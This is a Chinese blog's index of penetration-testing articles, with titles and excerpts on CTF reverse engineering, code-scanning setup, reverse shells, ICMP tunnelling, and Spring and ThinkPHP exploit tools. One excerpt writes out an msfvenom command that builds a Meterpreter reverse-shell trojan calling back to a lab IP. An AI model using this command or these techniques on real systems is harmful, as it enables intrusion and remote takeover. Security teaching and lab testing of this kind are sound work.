
渗透测试工具
文章平均质量分 88
归去来兮-zangcc
悟已往之不谏,知来者之可追.实迷途其未远,觉今是而昨非.优快云认证博客专家 网络安全领域优质创作者;拥有CNVD原创漏洞证明/漏洞盒子·公益联盟领袖证书/CVE/Edusrc漏洞报送证书等漏洞证书十几张;想学习Java安全/代码审计的可以关注我的公众号或联系我 目前在企业做SDL开发安全,每天和代码打交道,搞安全的同时,顺便写写文章解闷,所以有了这个博客。
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
国外Matrix CTF「Oh, Bugger」思路解析:Frida hook 轻松拿Flag
聚焦国外Matrix CTF安卓逆向题,运用Frida进行关键函数Hook原创 2025-06-03 23:25:13 · 4211 阅读 · 0 评论 -
「2025最新」Visual Studio Code配置CodeQL代码扫描-基于MacBook M系列芯片(ARM)
「2025最新」Visual Studio Code配置CodeQL代码扫描-基于MacBook M系列芯片(ARM)原创 2025-04-02 16:03:45 · 1352 阅读 · 0 评论 -
Burp Suite + AI 究竟有多强?最新插件Hackvertor的使用技巧
关注微信公众号Eureka安全,后续技术文章都会首发公众号✅提示:以下是本篇文章正文内容,下面案例可供参考在应用安全领域,创新始终是推动技术进步的核心动力。PortSwigger 作为这一领域的佼佼者,一直致力于突破传统技术的边界,为了进一步提升安全测试的效率和效果,在2025年,终于在 Burpsuite Professional 中引入了 AI 驱动的扩展功能,将可扩展性提升到了一个全新的高度!🍺🍺 黑客界的“懒人神器”?Burp Suite + AI 插件让你“躺着”搞渗透。原创 2025-03-11 19:44:47 · 5738 阅读 · 1 评论 -
Wazuh:最受欢迎的开源HIDS系统在甲方安全建设中的应用(文末送书)
Wazuh,作为一款顶级的开源主机入侵检测系统(HIDS),在甲方安全建设中扮演着至关重要的角色。本文为大家提供一个全面的Wazuh安装和使用指南,帮助在企业安全建设中利用这一强大的安全工具来增强网络安全防护。因为提供了详细的步骤,所以篇幅可能会有点长。原创 2024-08-16 13:49:45 · 4930 阅读 · 0 评论 -
【App渗透】BurpSuite插件-Brida 2024最新自动加解密Custom plugins演示
之前有写过如何安装brida的文章和视频讲解,大家感兴趣的可以看看之前的内容,分别是①BurpSuite插件Brida的安装②Brida js-hook脚本的简单配置和debug调试。我的B站主页今天就是介绍下Brida的核心功能——自动加解密;如何在反编译之后hook加密和解密函数,自动加解密暴破密码。原创 2024-07-16 11:57:46 · 2654 阅读 · 0 评论 -
App渗透:BurpSuite插件-Brida apk逆向自动加解密Custom plugins演示
【App渗透:BurpSuite插件-Brida apk逆向自动加解密Custom plugins演示】很久很久之前,更新过Brida的安装和hook脚本的调试,今晚终于更新了Brida的核心功能,自动加解密。视频里演示的app是我自己开发的,功能比较简单,就是一个登录框,用户名和密码正确就能登录成功。如果大家想要我这个测试app的可以找我要,感兴趣的话可以点击B站链接。原创 2024-07-03 14:47:59 · 693 阅读 · 0 评论 -
2024-BurpSuite快速配置Jython插件环境
很多插件需要python环境,Burpsuite本身是支持java的,Jython就是java和python的结合。本文主要介绍如何在BurpSuite配置Jython。原创 2024-05-27 10:53:09 · 3995 阅读 · 0 评论 -
【送书活动第1期】2024最新!依赖扫描神器Trivy的详细使用教程(Jar/Maven/docker images镜像)(文末送书)
Trivy是一款全面的多功能安全扫描器。Trivy 扫描器可以查找安全问题,并能在发现问题的地方锁定目标。可以扫描javax项目依赖,支持jar包依赖扫描以及docker镜像扫描,非常方便,利于安全人员进行代码审计,推动漏洞修复或者渗透测试。原创 2024-04-22 18:09:14 · 2766 阅读 · 12 评论 -
2024新版SonarQube+JenKins+Github联动代码扫描(3)-三者联动配置最终章
终于来到最后了。前面的两篇文章都是配置项,务必能成功启动和运行,才可以进行第三步的联动配置。SonarQube+JenKins+Github三者之间的自动化构建和代码扫描,听起来确实是非常高效率的,但是网上文章都是老版本,很多都是2018左右的版本,照着他们的步骤来,在2024年的今天,新版是完全不一样了,所以我当初配置的时候,也是花了2天的时间,最后总结成3篇文章,供大家参考。原创 2024-03-05 15:12:38 · 1309 阅读 · 0 评论 -
2024新版SonarQube+JenKins+Github联动代码扫描(2)-SonarQube代码扫描
这是2024新版SonarQube+JenKins+Github联动代码扫描专题的第二部分,也是核心内容,SonarQube目前是半开源,可以自定义漏洞扫描规则,这个后面有时间可以出一篇教程,本文主要是讲2024最新版的配置和如何进行代码扫描。提示:以下是本篇文章正文内容,下面案例可供参考JenKins安装与配置是SonarQube+JenKins+Github联动代码扫描的第二步。2024新版SonarQube+JenKins+Github联动代码扫描(1)-JenKins安装与配置。原创 2024-03-05 14:42:00 · 1482 阅读 · 2 评论 -
2024新版SonarQube+JenKins+Github联动代码扫描(1)-JenKins安装与配置
Sonar是一个半开源的静态代码扫描工具,试用过一次觉得功能还算可以,所以记录一下SonarQube扫描的用法以及在中大型企业进行SDL安全审计的时候,如果用SonarQube+JenKins+Github三者联动进行代码扫描,快速,方便,自动化!如果大家只关心Sonar的静态扫描,可以看本系列的第二部分,也就是2024新版SonarQube+JenKins+Github联动代码扫描(2)-SonarQube安装与配置,可以在我的博客主页进行搜索。原创 2024-03-05 14:20:30 · 1326 阅读 · 6 评论 -
【逆向】NahamCon CTF -Click Me Writeup(Brida&Frida Hook 拿Flag)
第一次做外国CTF比赛的mobile challenge 题,题目就是一个安卓的apk安装包。顺便记录一下代码分析过程以及分享两种不同的解题思路。这里只想到这两种办法解,如果你还有更好的办法或者思路,欢迎提出。欢迎关注公众号:Eureka安全团队。以后文章多数会以公众号为主。原创 2023-11-23 17:29:41 · 440 阅读 · 1 评论 -
(Chrome Ext)谷歌扩展程序-谷歌插件渗透测试方法记录
浏览器扩展分析,分析 Chrome扩展的漏洞。谷歌浏览器插件渗透测试,代码审计,Chrome扩展程序安全测试。原创 2023-07-20 19:47:57 · 1100 阅读 · 0 评论 -
【App渗透】用BurpSuite抓包安卓手机app内容(详细)
用BurpSuite进行抓包,在本机,安卓手机上面作app渗透,详细的用burpsuite在安卓手机上作app渗透的教程。原创 2023-06-26 20:08:21 · 16204 阅读 · 16 评论 -
【踩坑无数终极0错版】mac-Parallels Desktop的windwos虚拟机安装最新夜神模拟器+burpsuite证书安装+app渗透
mac-Parallels Desktop的windwos虚拟机安装最新夜神模拟器+burpsuite证书安装+app渗透原创 2023-05-19 17:33:03 · 5119 阅读 · 15 评论 -
【作者踩坑总结0错版】vscode配置codeql-MacBook(M1/M2芯片-arm)
codeql是一款静态代码分析引擎,适用于安全人员审计源码,挖掘漏洞。在macbook上的vscode配置codeql。原创 2023-05-13 16:10:06 · 3748 阅读 · 11 评论 -
Spring RCE漏洞CVE-2022-22965复现与JavaFx GUI图形化漏洞利用工具开发
Spring RCE漏洞CVE-2022-22965复现与JavaFx GUI图形化漏洞利用工具开发。CVE-2022-22965\Spring-Core-RCE核弹级别漏洞的rce图形化GUI一键利用工具,基于JavaFx开发,图形化操作更简单,提高效率。原创 2022-12-29 11:27:06 · 2215 阅读 · 5 评论 -
【Windows】基于curl命令的Shell上线姿势--解决shiro命令执行工具命令回显拉胯的问题
基于curl命令的Shell上线姿势--解决shiro命令执行漏洞命令回显拉胯的问题原创 2022-11-07 20:21:35 · 1259 阅读 · 0 评论 -
一条命令上线MSF(Metasploit)-web_delivery模块
一条命令上线MSF(Metasploit)-web_delivery模块原创 2022-10-31 22:33:34 · 2987 阅读 · 6 评论 -
基于JavaFx的ThinkPHP漏洞扫描工具---RexHa(Aazhen)的一些说明
基于JavaFx的Thinkphp漏洞扫描工具Rexha的一些使用说明。支持多种payload。多线程并发批量扫描。支持漏洞类型包括:ThinkPHP-2.x-RCE",ThinkPHP-5.0.23-RCE","ThinkPHP5.0.x-5.0.23通杀RCE","ThinkPHP5-SQL注入&敏感信息泄露","ThinkPHP 3.x 日志泄露NO.1","ThinkPHP 3.x 日志泄露NO.2","ThinkPHP 5.x 数据库信息泄露"。原创 2022-10-18 23:38:18 · 7731 阅读 · 32 评论 -
Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell
Cobalt Strike和Msf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的cs与msf互相反弹shell。Linux系统被控主机的反弹shell给cs和cs上的Linux主机反弹shell给msf。原创 2022-09-06 16:07:41 · 2764 阅读 · 2 评论 -
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
利用CrossC2插件工具,将Linux系统的shell反弹回Cobalt_Strike,方便后续的内网渗透。用CrossC2来反弹Linux主机shell给内网渗透工具Cobalt Strike(cs)。原创 2022-08-28 16:30:26 · 3878 阅读 · 9 评论 -
【MacOs系统-M2安装2022新版AWVS渗透工具】-保姆级安装教程
macbook pro M2,安装awvs渗透工具。全称无脑操作,亲测可用,基于docker。兼容macos的M系列芯片,本机使用awvs。mac安装2022新版awvs教程。原创 2022-08-20 03:37:50 · 6965 阅读 · 36 评论 -
【Pingtunnel工具教程】利用ICMP隧道技术进行ICMP封装穿透防火墙
在一些网络环境中,如果不经过认证,TCP和UDP数据包都会被拦截。如果用户可以ping通远程计算机,就可以尝试建立ICMP隧道,将TCP数据通过该隧道发送,实现不受限的网络访问。用户需要在受限制网络之外,预先启动该工具建立代理服务器。再以客户端模式运行该工具,就可以建立ICMP隧道。为了避免该隧道被滥用,用户还可以为隧道设置使用密码。内网渗透,渗透测试,内网隧道技术。......原创 2022-07-19 22:41:27 · 4254 阅读 · 2 评论 -
针对Vue框架渗透测试-未授权访问目录漏洞【渗透实战+工具开发】
针对vue框架渗透测试,vue漏洞,vue未授权访问目录漏洞复现和实战,针对vue未授权目录访问漏洞的安全工具开发,javafx漏洞扫描工具开发。原创 2022-07-18 11:07:37 · 29863 阅读 · 55 评论 -
Kali+docker搭建Vulfocus靶场并配置vulfocus漏洞环境
kali+docker搭建vulfocus靶场环境,并且在vulfocus靶场中添加相对应的安全漏洞环境,方便日常的渗透测试模拟、漏洞复现和安全工具有效性验证等等。最后感谢无私奉献的vulfocus工作人员和开发者。原创 2022-05-25 16:18:58 · 9534 阅读 · 7 评论 -
kail安装资产收集神器-ARL灯塔(安装方法笔记)
「ARL资产安全灯塔」可以快速完成与目标关联的互联网资产侦察工作,节省在渗透测试工作中资产收集与清查时间,提升渗透测试整体效率。**斗象TCC团队**正式发布「ARL资产安全灯塔」开源版,该项目现已上线开源社区GitHub。简单来说就是一款信息收集的神奇,用起来非常方便快捷,比纯手工去信息收集快很多,我用起来也是爽到飞起,十分推荐。原创 2021-12-29 10:46:11 · 12696 阅读 · 5 评论 -
永恒之蓝 (Ms17-010)漏洞复现
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。原创 2021-12-21 10:22:09 · 2838 阅读 · 0 评论 -
渗透小技巧从getshell到3389端口远程桌面连接靶机
渗透或平时比赛中还在为自己命令行操作不熟而感到烦恼吗?直接命令行方式启动远程桌面连接,让效率提高。原创 2021-12-16 13:51:11 · 18236 阅读 · 8 评论 -
小皮.phpstudyV8不知道怎么进入mysql命令行
新版小皮phpstudy_pro V8进入mysql命令行的方式原创 2021-10-02 20:26:01 · 4721 阅读 · 0 评论 -
Metasploit利用ms15-051漏洞进行权限提权
Metasploit利用ms15-051漏洞进行权限提权实验环境虚拟机:kali-linux(攻击机)192.168.18.142window server 2003(靶机)192.168.18.146工具:Metasploit步骤:1、生成木马文件:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.142 lport=4444 -f exe -o /root/shell.exe2、服务器网站目录上创建个shell原创 2021-04-01 01:05:35 · 3772 阅读 · 0 评论 -
Burp Suite抓不了DVWA本地包localhost127.0.0.1的解决办法
Burp Suite抓不了dvwa包的解决办法一、浏览器设置代理二、修改登录地址一、浏览器设置代理首选项>网络设置>设置打开Burp Suite,并且要先确认浏览器已经打开了代理可以发现,无论在dvwa里怎么输入,Burp Suite都抓不了包二、修改登录地址解决的办法是:我们不要用127.0.0.1的本地ip去登录dvwa原创 2020-12-03 11:27:26 · 7211 阅读 · 4 评论